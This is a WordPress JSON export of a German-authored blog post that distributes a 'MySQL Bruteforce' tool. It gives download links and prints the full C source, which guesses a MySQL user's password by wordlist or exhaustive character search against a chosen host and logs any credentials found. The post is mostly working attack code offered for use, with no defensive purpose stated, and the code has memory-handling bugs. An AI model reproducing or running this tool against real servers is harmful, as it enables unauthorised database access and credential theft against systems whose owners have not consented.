{"id":52,"date":"2013-01-21T22:05:59","date_gmt":"2013-01-21T20:05:59","guid":{"rendered":"http:\/\/bastardo.de\/?p=52"},"modified":"2013-01-21T22:05:59","modified_gmt":"2013-01-21T20:05:59","slug":"mysql-bruteforce-for-linux-and-windows","status":"publish","type":"post","link":"https:\/\/bastardo.de\/index.php\/2013\/01\/21\/mysql-bruteforce-for-linux-and-windows\/","title":{"rendered":"MySQL Bruteforce for Linux and Windows"},"content":{"rendered":"<p><strong>Linux Source and Binarys<\/strong><\/p>\n<p><a href=\"https:\/\/bastardo.de\/wp-content\/uploads\/2013\/01\/mysql-bruteforce.c\">mysql-bruteforce.c<\/a> (Sourcecode)<a href=\"https:\/\/bastardo.de\/mysql-bruteforce\/mysql-bruteforce-tar\/\" rel=\"attachment wp-att-7\"><br \/>\nmysql-bruteforce.tar<\/a> (sourcecode tarball)<a href=\"https:\/\/bastardo.de\/mysql-bruteforce\/mysql-bruteforce-tar\/\" rel=\"attachment wp-att-7\"><br \/>\n<\/a> <a href=\"https:\/\/bastardo.de\/mysql-bruteforce\/mysql-bruteforce-binary-only-tar\/\" rel=\"attachment wp-att-9\">mysql-bruteforce-binary-only.tar<\/a> (compiled Binary)<br \/>\nYou need to install ncurses<\/p>\n<p><em>apt-get install libncurses5-dev libncurses5<\/em><\/p>\n<p><strong>Windows Source and Binarys<\/strong><\/p>\n<p><a href=\"https:\/\/bastardo.de\/wp-content\/uploads\/2013\/01\/mysql-bruteforce-win32.tar.gz\">mysql-bruteforce-win32.tar<\/a> (sourcecode tarball)<br \/>\n<a href=\"https:\/\/bastardo.de\/wp-content\/uploads\/2013\/01\/pdcurses.dll_.zip\">pdcurses.dll<\/a> (PDCurses.dll)<br \/>\n<a href=\"https:\/\/bastardo.de\/wp-content\/uploads\/2013\/01\/libmySQL.dll_.zip\">libmySQL.dll<\/a> (libmySQL.dll)<br \/>\n<a href=\"https:\/\/bastardo.de\/wp-content\/uploads\/2013\/01\/mysql-bruteforce-win32.c\">mysql-bruteforce-win32.c <\/a>SourceCode for Windows<\/p>\n<p>Here is the Source (Linux)<\/p>\n<pre class=\"brush:c\">#include &lt;stdio.h&gt;\n#include &lt;mysql\/mysql.h&gt;\n#include &lt;curses.h&gt;\n#include &lt;string.h&gt;\n#include &lt;stdlib.h&gt;\n\n\/\/ Deutsch oder English\n#define GER 1\n#define ENG 0\n\/*\n**************************************************************************************************\n*  MYSQL Bruteforce Programm aus purer lange Weile geschrieben \n*   23.03 2010 by cd \n*\n*   gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O2 -Wall\n*   oder -O6 anstatt -O2\n*  .\/mysql-bruteforce benutzer computer kennwortliste &lt;optional l\u00e4nge des kennworts&gt;\n*  log Datei ist \"mysql-bruteforce.log\"\n*\n**************************************************************************************************\n**************************************************************************************************\n*\n*  for the people that understand no german change the #define ENG to 1 and GER to 0\n*\n*  compile with: gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O3 -Wall\n*  or -O6 instead of -O2\n*  usage: .\/mysql-bruteforce user host &lt;password list&gt; &lt;optional len of password&gt;\n*  log file is \"mysql-bruteforce.log\"\n*\n**************************************************************************************************\n*\n*   Newest version http:\/\/bruteforce.at\/mysql\n*\n*   Think about the old good time MoD\n*   If you want to survive out here, you've got to know where your towel is.\n*\/\n\nMYSQL *my;\n\nint count=0;\nchar *passwd;\n\n#define STARTCHR 46 \/\/ 33 set start ascii char\n#define ENDCHR 122  \/\/ 127 set end ascii cahr\n#define BUFF_SIZE 1024\n#define LEN 80\n\nchar buffer[BUFF_SIZE];\nint jump=0;\n\nint main (int argc, char *argv[])\n{\nif (argc &lt;= 3 )\n    {\n#if ENG &amp;&amp; !GER\n    printf(\"\\n\"\n    \"\\n   MySQL Bruteforce, written by cd\\n\\n\"\n    \"    via wordlist\\n\"\n    \"    %s root localhost wordlist       # use complete wordlist\\n\"\n    \"    %s root 127.0.0.1 ..\/wordlist 7  # serch only words with 7 chars\\n\"\n    \"\\n\"\n    \"    standard bruteforce\\n\"\n    \"    %s root localhost -b      # Bruteforce Method (standard up to 8 chars)\\n\"\n    \"    %s root 127.0.0.1 -b 12   # up to 12 chars\\n\"\n    \"    %s root host -b 12 Test   # start with the given Word\\n\\n\\n\\n\\n\",argv[0],argv[0],argv[0],argv[0],argv[0]);\n#else\n    printf(\"\\n\"\n    \"\\n   MySQL Bruteforce, geschrieben von cd\\n\\n\"\n    \"    via W\u00f6rterliste\\n\"\n    \"    %s root localhost wordlist       # Gesamte W\u00f6rterliste durchsuchen\\n\"\n    \"    %s root 127.0.0.1 ..\/wordlist 7  # suche nur W\u00f6rter mit 7 Buchstaben\\n\"\n    \"\\n\"\n    \"    Standard Bruteforce\\n\"\n    \"    %s root localhost -b      # Bruteforce Methode (standard bis zu 8 Buchstaben)\\n\"\n    \"    %s root 127.0.0.1 -b 12   # bis zu 12 Buchstaben\\n\"\n    \"    %s root host -b 12 Test   # Startet mit angegebenen Wort\\n\\n\\n\\n\\n\",argv[0],argv[0],argv[0],argv[0],argv[0]);\n#endif\n    return 0;\n    }\n\nif(strcmp(argv[3],\"-b\")) \n    {\n\tjump=0;\n    } else jump=1;\n\n    initscr();\n    printw(\"\\n#################################\\n#\\tMYSQL Bruteforce\\t#\\n#\\t2010 by cd\\t\\t#\\n#################################\\n\\n\\t\\n\");\n    refresh();\n\n    char host[20];\n    char user[20];\n    my = mysql_init(NULL);\n    FILE *pass_list,*logfile;\n\nif( ( pass_list=fopen(argv[3],\"r\") ) == NULL &amp;&amp; jump!=1 ) \n{\n#if ENG &amp;&amp; !GER\nfprintf(stderr,\"Cannot open File \\\"%s\\\"\\n\", argv[3]);\n#else\nfprintf(stderr,\"Kann Datei \\\"%s\\\" nicht oeffnen.\\n\", argv[3]);\n#endif\nendwin();\nreturn 0;\n}\n\nif( ( logfile=fopen(\"mysql-bruteforce.log\",\"a+\") ) == NULL )\n{\n#if ENG &amp;&amp; !GER\nfprintf(stderr,\"Cannot open File \\\"%s\\\"\\n\", argv[3]);\n#else\nfprintf(stderr,\"Kann Datei \\\"%s\\\" nicht oeffnen.\\n\", argv[3]);\n#endif\nendwin();\nreturn 0;\n}\n\n    if(my == NULL)\n\t{\n#if ENG &amp;&amp; !GER\n\t    fprintf(stderr, \"Initialization failed\\n\");\n#else\n\t    fprintf(stderr, \"Initialisierung fehlgeschlagen\\n\");\n#endif\n\t    endwin();\n\t    return 0;\n\t}\n\nsprintf(user, \"%s\", argv[1]);\nsprintf(host, \"%s\", argv[2]);\n\nchar eingabe;\n\n#if ENG &amp;&amp; !GER\nmvprintw(5,2,\"User: %s Host: %s \",user,host);\n#else\nmvprintw(5,2,\"Benutzer: %s Server: %s \",user,host);\n#endif\n\nif (jump==1)\n{\nrefresh();\neingabe='b';\n\n}\nelse {eingabe='w';}\n\nswitch(eingabe)\n{\ncase 'b':\nwhile(1)\n{\n    int min=1,max;\n    if (argc&lt;=4)\n\t{\n\t    max=8;\n\t}\n\t    else \n\t    {\n\t\tmax=atoi(argv[4]); \n\t    }\n\n    char *pass=(char*)malloc(min);\n    int pos,x,found; \n\n\t    pass[min]='\\0';\n\n    if (argc&gt;=6)\n\t{ \n\t    min=strlen(argv[5]);\n\t    pass=argv[5];\n\t    pass[min+1]='\\0';\n\t    pos=min;\n\t    if (atoi(argv[4])!=strlen(argv[5]))\n\t\t{\n#if ENG &amp;&amp; !GER\n\t\t mvprintw(7,0,\"len of word must be the same the digit after -b\\n\"\n\t\t \"like: %s root localhost -b 4 abcd\\n\",argv[0]);\n#else\n\t\t mvprintw(7,0,\"l\u00e4nge des Wortes muss die gleiche seien wie die zahl nach -b\\n\"\n\t\t \"z.B: %s root localhost -b 4 abcd\\n\",argv[0]);\n#endif\n\t\t refresh();\n\t\t endwin();\n\t\t return 0;\n\t\t }\n\n\t}\n\n    for(x=min;x&lt;=max;x++)\n\t{\n\t    if(x&gt;min)\n\t\t{\n\t\t    if (realloc(pass, x)) \n\t\t\t{\n\t\t\t    memset(pass, STARTCHR, x);\n\t\t\t    pass[x]='\\0';\n\t\t\t} else {\n\t\t\t\t    mvprintw(13,1,\"error in realloc\");\n\t\t\t\t    endwin(); \n\t\t\t\t    return 1;\n\t\t\t\t}\n\t\t}\n\t    while(pass[0]&lt;ENDCHR)\n\t\t{\n\t\t    found=0;\n\t\t    if( mysql_real_connect (my,host,user,pass,NULL,0,NULL,0)  == NULL)\n\t\t\t{\n\t\t\t    move(6,2);\n\t\t\t    deleteln();\n\t\t\t    mvprintw(6,2,\"Pass: %s\",pass);\n\t\t\t    refresh();\n\t\t\t}\n\t\t\telse\n\t\t\t    {\n\t\t\t\tmove(6,2);\n\t\t\t\tdeleteln();\n\t\t\t\tmvprintw(6,2,\"Pass: %s\",pass);\n\t\t\t\trefresh();\n#if ENG &amp;&amp; !GER\n\t\t\t\tmvprintw(8,2,\"Login Success:\\t %s:%s@%s\\n\",user,pass,host);\n#else\n\t\t\t\tmvprintw(8,2,\"Login Erfolgreich:\\t %s:%s@%s\\n\",user,pass,host);\n#endif\n\t\t\t\trefresh();\n\t\t\t\tendwin();\n\t\t\t\tmysql_close(my);\n\t\t\t\tfprintf(logfile,\"%s:%s@%s\\r\\n\",user,pass,host);\n\t\t\t\treturn 0;\n\t\t\t    }\n\n\t\t    for(pos=x-1;pos!=0;pos--)\n\t\t\t{\n\t\t\t    if(pass[pos]==ENDCHR)\n\t\t\t\t{\n\t\t\t\t    memset(pass+pos, STARTCHR, strlen(pass)-pos);\n\t\t\t\t    pass[pos-1]++;\n\t\t\t\t    found=1;\n\t\t\t\t    break;\n\t\t\t\t}\n\t\t\t}\n\n\t\t    if(!found)\n\t\t\tpass[x-1]++;\n\t\t\tcount++;\n\t\t}\n\t}\n\n    move(6,2);\n    deleteln();\n#if ENG &amp;&amp; !GER\n    mvprintw(8,2,\"Password not found for %s@%s :\/\",user,host);\n#else\n    mvprintw(8,2,\"Passwort fuer %s@%s nicht gefunden :\/\",user,host);\n#endif\n    refresh();\n    endwin();\n    mysql_close (my);\n    return 0;\n}\nbreak;\n}\n\nint dummy;\nwhile((fscanf(pass_list, \"%s\\r\\n\", buffer))!=EOF)\n{\n    if (argv[4])\n\t{\n\t    if (strlen(buffer)!=atoi(argv[4])) goto next; \/\/ blubb goto i know ^^ phuu\n\t}\n\n    if( mysql_real_connect (my,host,user,buffer,NULL,0,NULL,0)  == NULL)\n\t{\n\t    move(6,2);\n\t    deleteln();\n\t    mvprintw(6,2,\"Pass: %s\",buffer);\n\t    refresh();\n\t}\n\telse\n\t    {\n\t\tmove(6,2);\n\t\tdeleteln();\n\t\tmvprintw(6,2,\"Pass: %s\",buffer);\n\t\trefresh();\n#if ENG &amp;&amp; !GER\n\t\tmvprintw(8,2,\"Login Success:\\t %s:%s@%s\\n\",user,buffer,host);\n#else\n\t\tmvprintw(8,2,\"Login Erfolgreich:\\t %s:%s@%s\\n\",user,buffer,host);\n#endif\n\t\trefresh();\n\t\tendwin();\n\t\tmysql_close(my);\n\t\tfprintf(logfile,\"%s:%s@%s\\r\\n\",user,buffer,host);\n\t\treturn 0;\n\t    }\nnext:\ndummy=1;\n}\n\n    move(6,2);\n    deleteln();\n#if ENG &amp;&amp; !GER\n    mvprintw(8,2,\"Password not found for %s@%s :\/\",user,host);\n#else\n    mvprintw(8,2,\"Passwort fuer %s@%s nicht gefunden :\/\",user,host);\n#endif\n    refresh();\n    endwin();\n    mysql_close (my);\n    return 0;\n}<\/pre>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Linux Source and Binarys mysql-bruteforce.c (Sourcecode) mysql-bruteforce.tar (sourcecode tarball) mysql-bruteforce-binary-only.tar (compiled Binary) You need to install ncurses apt-get install libncurses5-dev libncurses5 Windows Source and Binarys mysql-bruteforce-win32.tar (sourcecode tarball) pdcurses.dll (PDCurses.dll) libmySQL.dll (libmySQL.dll) mysql-bruteforce-win32.c SourceCode for Windows Here is the Source (Linux) #include &lt;stdio.h&gt; #include &lt;mysql\/mysql.h&gt; #include &lt;curses.h&gt; #include &lt;string.h&gt; #include &lt;stdlib.h&gt; \/\/ Deutsch oder English [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-52","post","type-post","status-publish","format-standard","hentry","category-allgemein"],"_links":{"self":[{"href":"https:\/\/bastardo.de\/index.php\/wp-json\/wp\/v2\/posts\/52","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/bastardo.de\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/bastardo.de\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/bastardo.de\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/bastardo.de\/index.php\/wp-json\/wp\/v2\/comments?post=52"}],"version-history":[{"count":0,"href":"https:\/\/bastardo.de\/index.php\/wp-json\/wp\/v2\/posts\/52\/revisions"}],"wp:attachment":[{"href":"https:\/\/bastardo.de\/index.php\/wp-json\/wp\/v2\/media?parent=52"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/bastardo.de\/index.php\/wp-json\/wp\/v2\/categories?post=52"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/bastardo.de\/index.php\/wp-json\/wp\/v2\/tags?post=52"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}